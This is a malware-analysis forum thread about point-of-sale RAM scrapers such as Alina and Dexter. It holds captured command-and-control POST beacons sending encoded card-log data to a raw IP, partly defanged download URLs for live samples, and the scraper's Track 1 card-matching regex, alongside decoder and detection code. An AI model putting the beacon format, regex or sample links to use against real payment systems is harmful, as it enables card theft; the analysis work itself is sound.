Point-of-Sale malwares / RAM scrapers

Forum for analysis and discussion about malware.
bsteo
Posts: 84
Joined: Fri Nov 16, 2012 5:50 pm

Re: Point-of-Sale malwares / RAM scrapers

Post by bsteo » Sun Feb 03, 2013 12:02 pm

Awesome xylitol, you've just ruined my Sunday :)
Now I have work to do.

Just took a look at the second sample (v2.1) from your previous post. It sent this to my fake PHP panel:

Code:

DATA: a:5:{s:3:"act";s:1:"l";s:1:"b";s:8:"982f17d9";s:1:"c";s:15:"XTMTRX-8D35CB4";s:1:"v";s:4:"v2.1";s:5:"ldata";s:326:"f0c2c5d8dfcac7c7c8c3cec8c091999bf68befcec7cedfc2c5cc8bc4c7cf8bcdc2c7ce8bcac7c2c5ca96e891f7efc4c8dec6cec5dfd88bcac5cf8bf8cedfdfc2c5ccd8f7eacfc6c2c5c2d8dfd9cadfc4d9f7efced8c0dfc4dbf7c9c4dff4cecf85ced3cea1f0d8dfcad9dff4dedbcfcadfcef4dfc3d9cecacf91999b9df68bdedbcfcadfce8bdfc3d9cecacf8bc7cadec5c8c3cecf8bd8dec8c8ced8d8cddec7c7d2a1";}
Now figuring out what's the encryption on the POST variable "ldata" (log data).

Xylitol
Global Moderator
Posts: 1670
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society

Re: Point-of-Sale malwares / RAM scrapers

Post by Xylitol » Sun Feb 03, 2013 12:26 pm

Alina 3.4 sample attached
In the wild: hxtp://pierremoreau.ca/backup2011/3_4.exe
https://www.virustotal.com/file/036e4f4 ... 359894166/ > 28/46

Code:

POST /forum/login.php HTTP/1.1
Accept: text/*, application/octet-stream
Content-Type: application/x-www-form-urlencoded
User-Agent: Alina v3.4
Host: 208.98.63.228
Content-Length: 642
Cache-Control: no-cache

act=l&b=8a43ad2&c=XYL2K-E87171510&v=v3.4&p=C:\3_4.exe&ldata=f0c2c5d8dfcac7c7c8c3cec8c0919a9a9c8b979b95f68befcec7cedfcecf8be891f7efc4c8dec6cec5dfd88bcac5cf8bf8cedfdfc2c5ccd8f7eacfc6c2c5c2d8dfd9cadfceded9f7eadbdbc7c2c8cadfc2c4c58befcadfcaf7dcc2c586cdc2d9cedccac7c785ced3ce8bcdd9c4c68bc4c7cf8bd8cedfdedb858bcfcec7cedfc2c5cc8bcadedfc4d8dfcad9df85a1f0c2c5d8dfcac7c7c8c3cec8c0919a9c928b979b95f68be2c5d8dfcac7c7cecf8bdfc48be891f7efc4c8dec6cec5dfd88bcac5cf8bf8cedfdfc2c5ccd8f7eacfc6c2c5c2d8dfd9cadfceded9f7eadbdbc7c2c8cadfc2c4c58befcadfcaf7c1ded8c8c3cecf85ced3ce878bd8dfcad9dfcecf8bc5cedc8bdbd9c4c8ced8d88bdcc2dfc38bcac7c2c5ca96e891f798f49f85ced3cea1

HTTP/1.1 666 OK
Server: nginx/1.0.15
Date: Sun, 03 Feb 2013 12:33:54 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.7

8
li:2:120
0
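Added example, not code from bsteo, Xylitol or the malware's panel: a decoder for the "ldata" field that appears in both bsteo's v2.1 panel capture and Xylitol's v3.4 POST above. It tries all 256 single-byte XOR keys and keeps the one whose output looks most like ASCII log text; on the v2.1 blob it recovers 0xAB and the hex turns into readable "[installcheck:20] ..." / "[start_update_thread:206] ..." lines. The `decode_beacon` helper parses the urlencoded field layout seen in the v3.4 request; the sample body it is fed is constructed (the `b`, `c` and `v` values are from the v2.1 capture, the `p` path is made up) because the v3.4 hex on the page is fused with the server response. Function names are my own.

```python
from typing import Optional, Tuple
from urllib.parse import parse_qs

# The "ldata" value from bsteo's v2.1 panel capture, copied from the thread
# (PHP serialize() reported it as s:326, i.e. 326 hex characters = 163 bytes).
LDATA_V21_HEX = (
    "f0c2c5d8dfcac7c7c8c3cec8c091999bf6"
    "8befcec7cedfc2c5cc8bc4c7cf8bcdc2c7ce8bcac7c2c5ca96"
    "e891f7efc4c8dec6cec5dfd88bcac5cf8bf8cedfdfc2c5ccd8f7eacfc6c2c5c2d8dfd9cadfc4d9"
    "f7efced8c0dfc4dbf7c9c4dff4cecf85ced3cea1"
    "f0d8dfcad9dff4dedbcfcadfcef4dfc3d9cecacf91999b9df6"
    "8bdedbcfcadfce8bdfc3d9cecacf8bc7cadec5c8c3cecf8bd8dec8c8ced8d8cddec7c7d2a1"
)


def printable_score(buf: bytes) -> float:
    """Score a candidate plaintext: -1 if any byte falls outside printable ASCII
    (tab, LF and CR allowed), otherwise the fraction of lowercase letters and
    spaces, which is high for the log-style text the panel receives."""
    if not buf:
        return -1.0
    for b in buf:
        if b > 0x7E or (b < 0x20 and b not in (0x09, 0x0A, 0x0D)):
            return -1.0
    return sum(1 for b in buf if b == 0x20 or 0x61 <= b <= 0x7A) / len(buf)


def xor_with_key(buf: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in buf)


def recover_xor_key(buf: bytes) -> int:
    """Brute-force every single-byte key and return the one whose output scores
    best; there are only 256 candidates, so this is instant."""
    return max(range(256), key=lambda k: printable_score(xor_with_key(buf, k)))


def decode_ldata(hex_blob: str, key: Optional[int] = None) -> Tuple[int, str]:
    """Hex-decode an ldata blob and XOR it with the given (or recovered) key."""
    raw = bytes.fromhex(hex_blob)
    if key is None:
        key = recover_xor_key(raw)
    return key, xor_with_key(raw, key).decode("ascii", errors="replace")


def decode_beacon(form_body: str) -> dict:
    """Split an urlencoded beacon body (act, b, c, v, p, ldata, as in the v3.4
    capture) into fields and attach the decoded log text."""
    fields = {k: v[0] for k, v in parse_qs(form_body, keep_blank_values=True).items()}
    if "ldata" in fields:
        key, text = decode_ldata(fields["ldata"])
        fields["xor_key"] = key
        fields["ldata_decoded"] = text
    return fields


# Constructed beacon body: layout from the v3.4 request, b/c/v values from the
# v2.1 capture, the p value is invented for the example.
SAMPLE_BODY = (
    "act=l&b=982f17d9&c=XTMTRX-8D35CB4&v=v2.1&p=C:\\sample.exe&ldata=" + LDATA_V21_HEX
)

if __name__ == "__main__":
    result = decode_beacon(SAMPLE_BODY)
    print("bot id:", result["b"], "host:", result["c"], "version:", result["v"])
    print("XOR key: 0x%02x" % result["xor_key"])
    print(result["ldata_decoded"])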

aaSSfxxx
Posts: 12
Joined: Tue Oct 23, 2012 8:28 pm

Re: Point-of-Sale malwares / RAM scrapers

Post by aaSSfxxx » Sun Feb 03, 2013 5:32 pm

Btw got new stuff on hXXp://royjamesinsurance.com/images/ .

This time, no SQL Server creds in command strings :( (malware attached).
Same shit as the sample I posted before.
https://www.virustotal.com/file/6d4d91f ... 359968332/ > 10/46
Last edited by Xylitol on Mon Feb 04, 2013 9:00 am, edited 1 time in total.
Reason: Link obfuscation

bsteo
Posts: 84
Joined: Fri Nov 16, 2012 5:50 pm

Re: Point-of-Sale malwares / RAM scrapers

Post by bsteo » Sun Feb 03, 2013 6:24 pm

Sends data to some panel now or...?

aaSSfxxx
Posts: 12
Joined: Tue Oct 23, 2012 8:28 pm

Re: Point-of-Sale malwares / RAM scrapers

Post by aaSSfxxx » Sun Feb 03, 2013 8:36 pm

No, it seems to store data in a local SQL Server database (the new sample seems to have the same structure as the other ones).

Xylitol
Global Moderator
Posts: 1670
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society

Re: Point-of-Sale malwares / RAM scrapers

Post by Xylitol » Tue Feb 05, 2013 1:35 pm


Buster_BSA
Posts: 390
Joined: Mon Mar 22, 2010 6:42 am

Re: Point-of-Sale malwares / RAM scrapers

Post by Buster_BSA » Tue Feb 05, 2013 4:38 pm

Xylitol wrote: fresh Troj/Trackr-Gen
https://www.virustotal.com/file/f72a63c ... 360071120/ > 19/46

Code:

 Report generated with Buster Sandbox Analyzer 1.87 at 17:36:13 on 05/02/2013

 [ General information ]
   * Analysis duration: 00:00:30
   * File name: c:\m\test\f72a63c004508855a526779798c2d8ae035c87d2f43467cd9e1b0467dad67fa8.exe
   * File length: 128000 bytes
   * File signature (PEiD): Borland Delphi 6.0 - 7.0
   * File signature (Exeinfo): Borland Delphi ( 2.0 - 7.0 ) 1992 - www.borland.com
   * File type: EXE
   * TLS hooks: NO
   * File entropy: 6.50491 (81.3113%)
   * ssdeep signature: 3072:giYkr6DJ2ZUSlcCwDesr/QOOGXbn4DQFu/U3buRKlemZ9DnGAeJo5CQh6BrUO3ss:Bv+KFiDXL4DQFu/U3buRKlemZ9DnGAeK
   * Adobe Malware Classifier: Malicious
   * Digital signature: Unsigned
   * MD5 hash: aef00dcd16d6aad056a345ac320a8d99
   * SHA1 hash: 48db3a315d9e8bc0bce2c99cfde3bb9224af3dce
   * SHA256 hash: f72a63c004508855a526779798c2d8ae035c87d2f43467cd9e1b0467dad67fa8

 [ Changes to filesystem ]
   * No changes

 [ Changes to registry ]
   * No changes

 [ Network services ]
   * No changes

 [ Process/window/string information ]
   * Checks for debuggers.
   * Enumerates running processes.
   * Contains string Point-of-sale information stealer ("((b|B)[0-9]{13,19}\^[A-Za-z\s]{0,30}\/[A-Za-z\s]{0,30}\^(0[7-9]|1[0-5])((0[1-9])|(1[0-2]))[0-9\s]{3,50}[0-9]{1})")
   * Sleeps 30 seconds.

gritland
Posts: 31
Joined: Tue May 11, 2010 10:57 am

Re: Point-of-Sale malwares / RAM scrapers

Post by gritland » Wed Feb 06, 2013 3:15 pm

Someone has an unpacked version of Dexter?

bsteo
Posts: 84
Joined: Fri Nov 16, 2012 5:50 pm

Re: Point-of-Sale malwares / RAM scrapers

Post by bsteo » Wed Feb 06, 2013 3:36 pm

gritland wrote: Someone has an unpacked version of Dexter?
Interested too. I unpacked one with Volatility but it seems I've broken it somewhere; it runs but gives an error.

bsteo
Posts: 84
Joined: Fri Nov 16, 2012 5:50 pm

Re: Point-of-Sale malwares / RAM scrapers

Post by bsteo » Wed Feb 06, 2013 4:32 pm

Little harmless code I made to trigger any POS malware to grab and send data to the C&C. Attached compiled with VS10. Code as follows:

Code:

#include <iostream>
#include <conio.h>
#include <windows.h>

using namespace std;

// Bogus Track 1 / Track 2 strings laid out the way a RAM scraper's regex expects;
// the numbers are not real cards. They stay in process memory until a key is pressed.
char track1[100] = "%B4560710014901111^TEST JIM/BOGUS JOS^1107101169940000000710717906968?";
char track2[100] = "4744870016311111=14091010000000000072";

int main(){
	cout << track1 << endl;
	cout << track2 << endl;
	_getch();   // block here so the strings remain resident while a scraper scans
	return 0;
}
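Added example, not code from Buster_BSA, bsteo or any sandbox: it takes the Track 1 regex printed in the Buster Sandbox Analyzer report above and runs it over bsteo's bogus test strings, so you can confirm the lab trigger is in a shape the scraper pattern accepts (Track 1 only; the "=" Track 2 string does not match it), log a hit with the PAN masked, and reuse the regex text itself as a static indicator the way the sandbox's "Contains string" check does. The two fake file buffers and all function names are constructed for the example.

```python
import re

# Track 1 regex copied verbatim from the Buster Sandbox Analyzer report in this thread
TRACK1_PATTERN = re.compile(
    r"((b|B)[0-9]{13,19}\^[A-Za-z\s]{0,30}\/[A-Za-z\s]{0,30}\^(0[7-9]|1[0-5])"
    r"((0[1-9])|(1[0-2]))[0-9\s]{3,50}[0-9]{1})"
)

# bsteo's bogus test strings from the C++ trigger above (not real card numbers)
TRACK1_TEST = "%B4560710014901111^TEST JIM/BOGUS JOS^1107101169940000000710717906968?"
TRACK2_TEST = "4744870016311111=14091010000000000072"


def find_track1(text: str) -> list:
    """Return every substring the report's regex would accept as Track 1 data."""
    return [m.group(1) for m in TRACK1_PATTERN.finditer(text)]


def mask_pan(track: str) -> str:
    """Keep only the first six and last four PAN digits so a finding can be
    written to a ticket or SIEM without copying the full number."""
    m = re.match(r"([bB])([0-9]{13,19})(\^.*)$", track, re.S)
    if not m:
        return track
    pan = m.group(2)
    masked = pan[:6] + "*" * (len(pan) - 10) + pan[-4:]
    return m.group(1) + masked + m.group(3)


def embeds_track1_regex(sample: bytes) -> bool:
    """Static check mirroring the sandbox's 'Contains string' heuristic: does the
    file carry the regex source text itself?"""
    return TRACK1_PATTERN.pattern.encode() in sample


# Constructed stand-ins: one buffer that embeds the pattern text, one that does not
FAKE_SCRAPER = b"MZ\x90\x00" + b"\x00" * 16 + TRACK1_PATTERN.pattern.encode() + b"\x00"
FAKE_BENIGN = b"MZ\x90\x00" + b"hello world" + b"\x00" * 16

if __name__ == "__main__":
    for hit in find_track1(TRACK1_TEST + "\n" + TRACK2_TEST):
        print("track1 hit:", mask_pan(hit))
    print("fake scraper embeds regex:", embeds_track1_regex(FAKE_SCRAPER))
    print("benign file embeds regex:", embeds_track1_regex(FAKE_BENIGN))
```

The regex is unanchored, so it accepts the Track 1 body without the leading "%" sentinel and stops before the trailing "?"; that is the substring `find_track1` returns.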
